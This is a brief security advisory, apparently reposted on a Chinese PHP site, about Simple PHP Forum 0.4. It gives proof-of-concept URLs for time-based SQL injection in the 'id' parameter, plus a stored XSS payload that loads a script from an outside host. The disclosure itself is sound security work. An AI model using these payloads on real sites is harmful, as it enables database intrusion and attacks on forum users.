作者: loneferret of Offensive Security 影响产品: sphpforum 影响版本: 0.4 (older versions may be affected) 下载 地址: http://sourceforge.net/projects/sphpforum/ 程序概述 # Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple, # fast and allow easy integration into any existing web site. 缺陷分析: # Due to improper input sanitation, parameters are prone to SQL injection. Stored # crossed site scripting is also present in some forms. # PoC 1: # SQL Injection # Page: view_topic.php / view_profile.php? 缺陷参数 'id' # http:// www.2cto.com /sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271 # http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271 # PoC 2: #存储型 XSS # Page: create_topic.php # Vulnerable field: Topic # Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
查看更多关于sphpforum 0.4多个缺陷及修复 - 网站安全 - 自学php的详细内容...